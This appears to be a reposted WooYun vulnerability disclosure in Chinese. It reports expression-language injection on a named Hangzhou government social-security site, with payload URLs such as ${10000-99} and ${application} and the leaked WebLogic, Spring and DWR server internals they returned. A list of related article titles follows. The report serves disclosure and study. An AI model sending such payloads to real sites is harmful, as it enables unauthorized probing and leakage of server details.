Expression language injection
2015-05-15 14:25
309 查看
Expression language injection
详细说明:
站点:http://www.zjhz.lss.gov.cn/测试连接:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d效果如图:测试方法是参照这个的:大众点评某站点Expression language injection | WooYun-2014-71160 | WooYun.orgWooYun: 大众点评某站点Expression language injection应该是这样玩的吧(⊙v⊙)漏洞证明:
http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7dview-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}code 区域<script src="/web/resource/script/list_utf8.js?year=%7Borg.directwebremoting.Container%3Dorg.directwebremoting.impl.DefaultContainer%406f55455e%2C+org.directwebremoting.ContainerList%3D%5Borg.directwebremoting.impl.DefaultContainer%406f55455e%5D%2C+__oscache_cache%3Dcom.opensymphony.oscache.web.ServletCache%406c70a195%2C+__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%2C+weblogic.servlet.WebAppComponentRuntimeMBean%3Dweblogic.servlet.internal.WebAppRuntimeMBeanImpl%4026c66b4a%2C+org.springframework.web.context.WebApplicationContext.ROOT%3Dorg.springframework.web.context.support.XmlWebApplicationContext%4036e79009%3A+display+name+%5BRoot+WebApplicationContext%5D%3B+startup+date+%5BTue+Feb+10+17%3A32%3A25+CST+2015%5D%3B+root+of+context+hierarchy%2C+__oscache_admins%3D%7B__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%7D%2C+org.directwebremoting.WebContextFactory%24WebContextBuilder%3Dorg.directwebremoting.impl.DefaultWebContextBuilder%404ed39061%2C+javax.servlet.context.tempdir%3D%2Fopt%2FMiddleware%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2Fapp1%2Ftmp%2F_WL_user%2Fweb%2Faakfdm%2Fpublic%2C+javax.servlet.ServletConfig%3Dweblogic.servlet.internal.ServletStubImpl%404422e93c+-+dwr-invoker+class%3A+%27uk.ltd.getahead.dwr.DWRServlet%27%2C+freemarker.Configuration%3Dfreemarker.template.Configuration%404b7c27f3%2C+weblogic.servlet.WebAppComponentMBean%3Dweblogic.management.configuration.WebAppComponentMBeanImpl%401a3b23f1%28%5Bbase_domain%5D%2FApplications%5Bweb%5D%2FWebAppComponents%5Bweb%5D%29%2C+org.directwebremoting.impl.ServerContext%3Dorg.directwebremoting.impl.DefaultServerContext%40568074d1%2C+contextConfigLocation%3D%2FWEB-INF%2Fclasses%2FapplicationContext.xml%2C+com.sun.faces.config.WebConfiguration%3Dcom.sun.faces.config.WebConfiguration%4023abf8b5%2C+javax.servlet.http.HttpServlet%3Duk.ltd.getahead.dwr.DWRServlet%404ffe8516%7D"></script>站点:http://survey.dianping.com/
漏洞证明:
[/code]相关文章推荐
- expression language injection
- Spring Expression Language (Spring 3.0)
- JSP EL expression language
- JSF Expression Language
- Correction: JSTL and expression language problem: According to TLD or attribute directive in tag file, attribute value does not
- JSF---->JSF Expression Language
- Spring学习总结(四)——表达式语言 Spring Expression Language
- Spring Expression Language (SpEL)
- Android Studio 出现 lande expression are not supported at this language level 的解决方案
- Mule-specific expression language-MEL学习
- SPEL语言-Spring Expression Language
- Regular Expression Language Elements
- Spring in Action 3 -Spring Expression Language (SpEL)
- Natural Language Expression VS SPARQL
- How to create custom methods for use in spring security expression language annotations
- Spring Expression Language (SpEL)-Spring表达式语言
- JSF JSF Expression Language JSF 表达式
- Spring学习总结(四)——表达式语言 Spring Expression Language
- Java Expression Language (JEXL)
- JSP Expression Language